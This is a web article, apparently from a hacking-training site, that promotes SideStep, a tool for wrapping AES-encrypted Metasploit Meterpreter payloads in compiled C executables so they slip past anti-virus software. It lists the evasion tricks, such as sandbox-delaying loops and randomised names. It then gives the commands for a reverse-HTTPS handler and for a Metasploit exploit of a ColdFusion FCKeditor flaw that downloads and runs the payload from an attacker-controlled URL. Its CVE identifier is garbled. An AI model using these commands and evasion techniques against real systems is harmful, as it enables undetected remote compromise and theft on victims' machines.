SideStep: Yet another Anti-virus Evasion Tool

SideStep is yet another tool to bypass anti-virus software. The tool
generates Metasploit payloads encrypted using the CryptoPP library
(license included), and uses several other techniques to evade AV.

SideStep is a python script that automatically generates and compiles C code that uses encrypted Metasploit payloads.

Some of the features of SideStep used to evade AV software includes:

  1. Encrypts the msfvenom generated Meterpreter shellcode using AES
    128bit encryption (using the CryptoPP C++ library) with a randomly
    generated key. The payload is decrypted just prior to execution.
  2. Randomizes all variable names and functions. The size of the names and functions is configurable.
  3. Creates a function that checks the local time on the host, then
    loops for a configurable amount of seconds at the beginning of the
    program, to evade AV sandboxes. There is also the addition of a DH
    parameter generator which adds extra time to the startup.
  4. Stuffs the executable with a configurable number of random variables
    that have random values of a configurable size. These variables are
    prior to the call to main(). This is a technique that is occasionally
    effective and that I picked up from the NCC Group Metasploit Evasion
    link above.
  5. If Cygwin is present, it uses strip to remove debugging symbols and other useful reversing information.
  6. If you want to use peCloak, it will then encode the assembly instructions in the executable as the last step.

Requirements:

  • Metasploit Community 4.11.1 – Update 2015031001 (or later – this is
    what I tested with and some recent previous versions screwed up the
    shellcode when using the alpha encoder)
  • Ruby 2.x
  • Windows (7 or 8 should work – tested on 8.1)
  • Python 2.7.x
  • Visual Studio (free editions should be fine – tested on 2012)
  • Windows SDK
  • Cygwin with strip utility (if you want to strip debug symbols)
  • peCloak (if you want to use it)

Usage

You must configure settings in confsettings.py, and then you must at
a minimum provide the Metasploit listening handler IP and port:

python sidestep.py –ip 192.168.1.1 –port 443

If using the defaults, then a source file will be generated in the
.source directory and the executable will be dropped in the .exe
directory.

Setup a Meterpreter handler on your attacking machine like so (modifying the PAYLOAD, LHOST, and LPORT as needed):

  use multi/handler
  set PAYLOAD windows/meterpreter/reverse_https
  set LHOST 192.168.1.1
  set LPORT 443
  set AutoRunScript post/windows/manage/smart_migrate
  run

The best way to deliver the executable via Metasploit is to load up your
exploit, and then set the PAYLOAD to windows/download_exec, and upload
the executable to a web server. Sample configuration:

  use exploit/windows/http/coldfusion_fckeditor
  set PAYLOAD windows/download_exec
  set EXE sidestep.exe
  set URL http://www.attacker.com:80/sidestep.exe
  set AutoRunScript post/windows/manage/smart_migrate
  set RHOST 1.1.1.1
  set RPORT 80
  run

This would exploit the FCKeditor vulnerability in ColdFusion
(CVE-2209-2265), running shellcode that downloads an executable from the
provided URL, saves it as the provided EXE name, and then executes it.
You can get the source code to SideStep here.

Ehacking Staff
With more than 50 global partners, we are proud to count the world’s leading cybersecurity training provider. EH Academy is the brainchild of Ehacking, which has been involved in the field of training since the past Five years and continues to help in creating professional IT experts.

Most Popular

LINUX GAME HACKING GUIDE 2021

In the past, most games had cheat codes, yet these days it's more uncommon. As a programmer, I like to perceive how things work,...

Phishing Prevention: How to Secure Your Organization Against Phishing Attacks

Phishing is a type of cyberattack that aims to trick people into giving up their sensitive information or hack into a system by means...

Automated Penetration Testing Prevents High-Risk Vulnerabilities

According to new research from Positive Technologies, a substantial 84% of companies contain high-risk vulnerabilities within their network perimeter. Scanning as many as 3,514...

Security Concerns When You’re Running Your Company From Abroad

The world of technology makes it possible for entrepreneurs to run their businesses from any location worldwide. You could travel and move to any...

LOOKING FOR HACKING RECIPES FORM THE PRO?

Then sign up for FREE to the ehacking’s exclusive group. You will get the exclusive tips/tricks, tutorials, webinars & courses that I ONLY share with my fellow on this exclusive newsletter.